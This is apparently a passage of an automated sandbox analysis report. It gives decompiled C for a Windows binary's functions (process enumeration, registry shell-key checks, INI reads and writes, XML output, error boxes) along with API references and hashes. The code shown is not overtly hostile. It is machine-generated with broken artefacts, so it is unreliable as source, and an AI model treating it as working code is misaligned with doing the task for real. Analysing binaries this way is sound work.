                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 35%
                                                                                                                                                                                                                          			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                                                                                                                                                          				void* _v0;
                                                                                                                                                                                                                          				intOrPtr _v4;
                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                          				unsigned int _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                          				char _v24;
                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				intOrPtr _t58;
                                                                                                                                                                                                                          				void* _t59;
                                                                                                                                                                                                                          				void* _t72;
                                                                                                                                                                                                                          				intOrPtr _t78;
                                                                                                                                                                                                                          				void _t89;
                                                                                                                                                                                                                          				signed int _t90;
                                                                                                                                                                                                                          				int _t98;
                                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                                          				signed int _t106;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t106 = _t105 & 0xfffffff8;
                                                                                                                                                                                                                          				E0040B550(0x8874, __ecx);
                                                                                                                                                                                                                          				_t98 = 0;
                                                                                                                                                                                                                          				_a8 = 0;
                                                                                                                                                                                                                          				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
                                                                                                                                                                                                                          					if( *0x4101b8 != _t98) {
                                                                                                                                                                                                                          						_t89 = _a4;
                                                                                                                                                                                                                          						_t58 =  *0x40f83c(8, _t89);
                                                                                                                                                                                                                          						_v8 = _t58;
                                                                                                                                                                                                                          						if(_t58 != 0xffffffff) {
                                                                                                                                                                                                                          							_v0 = 1;
                                                                                                                                                                                                                          							_a560 = 0x428;
                                                                                                                                                                                                                          							_t59 =  *0x40f834(_t58,  &_a560);
                                                                                                                                                                                                                          							while(_t59 != 0) {
                                                                                                                                                                                                                          								memset( &_a8, _t98, 0x21c);
                                                                                                                                                                                                                          								_a12 = _a580;
                                                                                                                                                                                                                          								_a8 = _t89;
                                                                                                                                                                                                                          								wcscpy( &_a16,  &_a1096);
                                                                                                                                                                                                                          								_a540 = _a576;
                                                                                                                                                                                                                          								_t106 = _t106 + 0x14;
                                                                                                                                                                                                                          								_a544 = _a572;
                                                                                                                                                                                                                          								_a552 = 0x428;
                                                                                                                                                                                                                          								if(E00409510(_a8,  &_a8) != 0) {
                                                                                                                                                                                                                          									_t59 =  *0x40f830(_v16,  &_a552);
                                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          								goto L18;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          							goto L18;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					_t72 = OpenProcess(0x410, 0, _a4);
                                                                                                                                                                                                                          					_v0 = _t72;
                                                                                                                                                                                                                          					if(_t72 != 0) {
                                                                                                                                                                                                                          						_push( &_a4);
                                                                                                                                                                                                                          						_push(0x8000);
                                                                                                                                                                                                                          						_push( &_a2160);
                                                                                                                                                                                                                          						_push(_t72);
                                                                                                                                                                                                                          						if( *0x40f840() != 0) {
                                                                                                                                                                                                                          							_t6 =  &_v12;
                                                                                                                                                                                                                          							 *_t6 = _v12 >> 2;
                                                                                                                                                                                                                          							_v8 = 1;
                                                                                                                                                                                                                          							_t90 = 0;
                                                                                                                                                                                                                          							if( *_t6 != 0) {
                                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                                          									_a1616 = _t98;
                                                                                                                                                                                                                          									memset( &_a1618, _t98, 0x208);
                                                                                                                                                                                                                          									memset( &_a8, _t98, 0x21c);
                                                                                                                                                                                                                          									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                                                                                                                                                          									_t106 = _t106 + 0x18;
                                                                                                                                                                                                                          									_a8 = _a4;
                                                                                                                                                                                                                          									_a12 = _t78;
                                                                                                                                                                                                                          									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                                                                                                                                                                          									E0040920A( &_v0,  &_a1600);
                                                                                                                                                                                                                          									_push(0xc);
                                                                                                                                                                                                                          									_push( &_v20);
                                                                                                                                                                                                                          									_push(_v4);
                                                                                                                                                                                                                          									_push(_v32);
                                                                                                                                                                                                                          									if( *0x40f844() != 0) {
                                                                                                                                                                                                                          										_a508 = _v32;
                                                                                                                                                                                                                          										_a512 = _v36;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									if(E00409510(_a8,  &_v24) == 0) {
                                                                                                                                                                                                                          										goto L18;
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									_t90 = _t90 + 1;
                                                                                                                                                                                                                          									if(_t90 < _v44) {
                                                                                                                                                                                                                          										_t98 = 0;
                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                          									goto L18;
                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						L18:
                                                                                                                                                                                                                          						CloseHandle(_v16);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _a8;
                                                                                                                                                                                                                          			}
























                                                                                                                                                                                                                          0x00409377
                                                                                                                                                                                                                          0x00409385
                                                                                                                                                                                                                          0x0040938d
                                                                                                                                                                                                                          0x0040939d
                                                                                                                                                                                                                          0x004093a5
                                                                                                                                                                                                                          0x004093ac
                                                                                                                                                                                                                          0x004093b4
                                                                                                                                                                                                                          0x004093c5
                                                                                                                                                                                                                          0x004093c9
                                                                                                                                                                                                                          0x004093da
                                                                                                                                                                                                                          0x004093df
                                                                                                                                                                                                                          0x004093e5
                                                                                                                                                                                                                          0x004093e6
                                                                                                                                                                                                                          0x004093ea
                                                                                                                                                                                                                          0x004093f6
                                                                                                                                                                                                                          0x004093fc
                                                                                                                                                                                                                          0x00409407
                                                                                                                                                                                                                          0x00409407
                                                                                                                                                                                                                          0x0040941d
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409423
                                                                                                                                                                                                                          0x00409428
                                                                                                                                                                                                                          0x00409375
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x0040942e
                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                          0x00409428
                                                                                                                                                                                                                          0x00409377
                                                                                                                                                                                                                          0x0040936d
                                                                                                                                                                                                                          0x004094fb
                                                                                                                                                                                                                          0x004094ff
                                                                                                                                                                                                                          0x004094ff
                                                                                                                                                                                                                          0x00409337
                                                                                                                                                                                                                          0x0040950f

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040939D
                                                                                                                                                                                                                            • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409488
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004094A9
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3300951397-0
                                                                                                                                                                                                                          • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                                                                                                                          • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                                                          			E00402EC8(void* __ebx) {
                                                                                                                                                                                                                          				struct tagRECT _v20;
                                                                                                                                                                                                                          				struct tagPAINTSTRUCT _v84;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                                                                                                                                                          				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                                                                                                                                                          				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                                                                                                                                                          				asm("movsd");
                                                                                                                                                                                                                          				asm("movsd");
                                                                                                                                                                                                                          				asm("movsd");
                                                                                                                                                                                                                          				asm("movsd");
                                                                                                                                                                                                                          				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                                                                                                                                                          				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 19018683-0
                                                                                                                                                                                                                          • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                                                                          • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                                          			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                          				void _v514;
                                                                                                                                                                                                                          				signed short _v516;
                                                                                                                                                                                                                          				signed short* _t34;
                                                                                                                                                                                                                          				signed int _t37;
                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                          				signed short* _t44;
                                                                                                                                                                                                                          				void* _t46;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t40 = __edi;
                                                                                                                                                                                                                          				E00407343(__edi, _a4, L"<item>\r\n");
                                                                                                                                                                                                                          				_t37 = 0;
                                                                                                                                                                                                                          				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						_v516 = _v516 & 0x00000000;
                                                                                                                                                                                                                          						memset( &_v514, 0, 0x1fc);
                                                                                                                                                                                                                          						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                                                                                                                                                                          						_t44 =  &_v516;
                                                                                                                                                                                                                          						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                                                                                                                                                                          						_t34 = _t44;
                                                                                                                                                                                                                          						_push(_t34);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                                                                                                                                                                          						_push(_t34);
                                                                                                                                                                                                                          						_push(L"<%s>%s</%s>\r\n");
                                                                                                                                                                                                                          						_push(0x2000);
                                                                                                                                                                                                                          						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_t46 = _t46 + 0x24;
                                                                                                                                                                                                                          						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                                                                                                                                                                          						_t37 = _t37 + 1;
                                                                                                                                                                                                                          					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004079DB
                                                                                                                                                                                                                            • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                                                                                                                                            • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                                                                                                                            • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00407A25
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                                                          • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 64%
                                                                                                                                                                                                                          			E0040467A(void* __edi) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				void _v2062;
                                                                                                                                                                                                                          				short _v2064;
                                                                                                                                                                                                                          				int _t16;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                                                          				_t16 = E004043F8( &_v12, 0x20019);
                                                                                                                                                                                                                          				if(_t16 == 0) {
                                                                                                                                                                                                                          					_v2064 = _v2064 & _t16;
                                                                                                                                                                                                                          					memset( &_v2062, _t16, 0x7fe);
                                                                                                                                                                                                                          					_push(__edi + 0x20a);
                                                                                                                                                                                                                          					_push(L"%s\\shell\\%s");
                                                                                                                                                                                                                          					_push(0x3ff);
                                                                                                                                                                                                                          					_push( &_v2064);
                                                                                                                                                                                                                          					L0040B1EC();
                                                                                                                                                                                                                          					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                                                                                                                                                                          						_v8 = 1;
                                                                                                                                                                                                                          						RegCloseKey(_v16);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 004046AF
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 004046CD
                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseOpen_snwprintfmemset
                                                                                                                                                                                                                          • String ID: %s\shell\%s
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 16%
                                                                                                                                                                                                                          			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                                                                                                                                                          				signed short _v131076;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t25 = __esi;
                                                                                                                                                                                                                          				E0040B550(0x20000, __ecx);
                                                                                                                                                                                                                          				if(_a4 == 0) {
                                                                                                                                                                                                                          					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                          					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                                                                                                                                                          						_push(_a24);
                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                          						_v131076 = _v131076 & 0x00000000;
                                                                                                                                                                                                                          						_push(__esi);
                                                                                                                                                                                                                          						_push(L"\"%s\"");
                                                                                                                                                                                                                          						_push(0xfffe);
                                                                                                                                                                                                                          						_push( &_v131076);
                                                                                                                                                                                                                          						L0040B1EC();
                                                                                                                                                                                                                          						_push(_a24);
                                                                                                                                                                                                                          						_push( &_v131076);
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00409D79
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                          • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                                                                                                                          • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                                                          			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                                                                                                                                                          				char _v2052;
                                                                                                                                                                                                                          				short _v4100;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				long _t15;
                                                                                                                                                                                                                          				long _t16;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t15 = __ecx;
                                                                                                                                                                                                                          				E0040B550(0x1000, __ecx);
                                                                                                                                                                                                                          				_t16 = _t15;
                                                                                                                                                                                                                          				if(_t16 == 0) {
                                                                                                                                                                                                                          					_t16 = GetLastError();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				E00404706(_t16,  &_v2052);
                                                                                                                                                                                                                          				_push( &_v2052);
                                                                                                                                                                                                                          				_push(_t16);
                                                                                                                                                                                                                          				_push(L"Error %d: %s");
                                                                                                                                                                                                                          				_push(0x400);
                                                                                                                                                                                                                          				_push( &_v4100);
                                                                                                                                                                                                                          				L0040B1EC();
                                                                                                                                                                                                                          				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00404813
                                                                                                                                                                                                                          • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                                                                                                                          • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                                                                                                                          • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                                                          			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				signed int _t74;
                                                                                                                                                                                                                          				signed int _t76;
                                                                                                                                                                                                                          				signed short _t85;
                                                                                                                                                                                                                          				signed int _t87;
                                                                                                                                                                                                                          				intOrPtr _t88;
                                                                                                                                                                                                                          				signed short _t93;
                                                                                                                                                                                                                          				void* _t95;
                                                                                                                                                                                                                          				signed int _t124;
                                                                                                                                                                                                                          				signed int _t126;
                                                                                                                                                                                                                          				signed int _t128;
                                                                                                                                                                                                                          				intOrPtr* _t131;
                                                                                                                                                                                                                          				signed int _t135;
                                                                                                                                                                                                                          				signed int _t137;
                                                                                                                                                                                                                          				signed int _t138;
                                                                                                                                                                                                                          				void* _t141;
                                                                                                                                                                                                                          				void* _t142;
                                                                                                                                                                                                                          				void* _t146;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t142 = __eflags;
                                                                                                                                                                                                                          				_push(_t102);
                                                                                                                                                                                                                          				_t131 = __eax;
                                                                                                                                                                                                                          				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                                                                                                                                                                          				E00406746(__eax);
                                                                                                                                                                                                                          				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                                                                                                                                                                          				_t135 = 5;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                                                                                                                                                                          				_t124 = 0x14;
                                                                                                                                                                                                                          				_t74 = _t135 * _t124;
                                                                                                                                                                                                                          				 *(_t131 + 0x2d0) = _t135;
                                                                                                                                                                                                                          				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				 *(_t131 + 0x2d4) = _t74;
                                                                                                                                                                                                                          				_t126 = 0x14;
                                                                                                                                                                                                                          				_t76 = _t135 * _t126;
                                                                                                                                                                                                                          				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				_t95 = 0x40f008;
                                                                                                                                                                                                                          				 *(_t131 + 0x40) = _t76;
                                                                                                                                                                                                                          				_v8 = 0x40f008;
                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                          					_t137 =  *_t95 * 0x14;
                                                                                                                                                                                                                          					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                                                                                                                                                                          					_t24 = _t95 + 0x14; // 0x40f01c
                                                                                                                                                                                                                          					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                                                                                                                                                                          					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                                                                                                                                                                          					_t141 = _t141 + 0x18;
                                                                                                                                                                                                                          					_v12 = _t85;
                                                                                                                                                                                                                          					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                                                                                                                                                                          					if((_t85 & 0xffff0000) == 0) {
                                                                                                                                                                                                                          						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                                                                                                                                                                          						_t93 = E00405B81(_v12 | 0x00010000);
                                                                                                                                                                                                                          						_t95 = _v8;
                                                                                                                                                                                                                          						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t95 = _t95 + 0x28;
                                                                                                                                                                                                                          					_t146 = _t95 - 0x40f0d0;
                                                                                                                                                                                                                          					_v8 = _t95;
                                                                                                                                                                                                                          				} while (_t146 < 0);
                                                                                                                                                                                                                          				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                                                                                                                                                                          				_t138 = 5;
                                                                                                                                                                                                                          				_t128 = 4;
                                                                                                                                                                                                                          				_t87 = _t138 * _t128;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                                                                                                                                                                          				 *(_t131 + 0x2c) = _t138;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                                                                                                                                                                          				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				_push(0xc);
                                                                                                                                                                                                                          				 *(_t131 + 0x30) = _t87;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				_t139 = _t87;
                                                                                                                                                                                                                          				if(_t87 == 0) {
                                                                                                                                                                                                                          					_t88 = 0;
                                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                                          				} else {
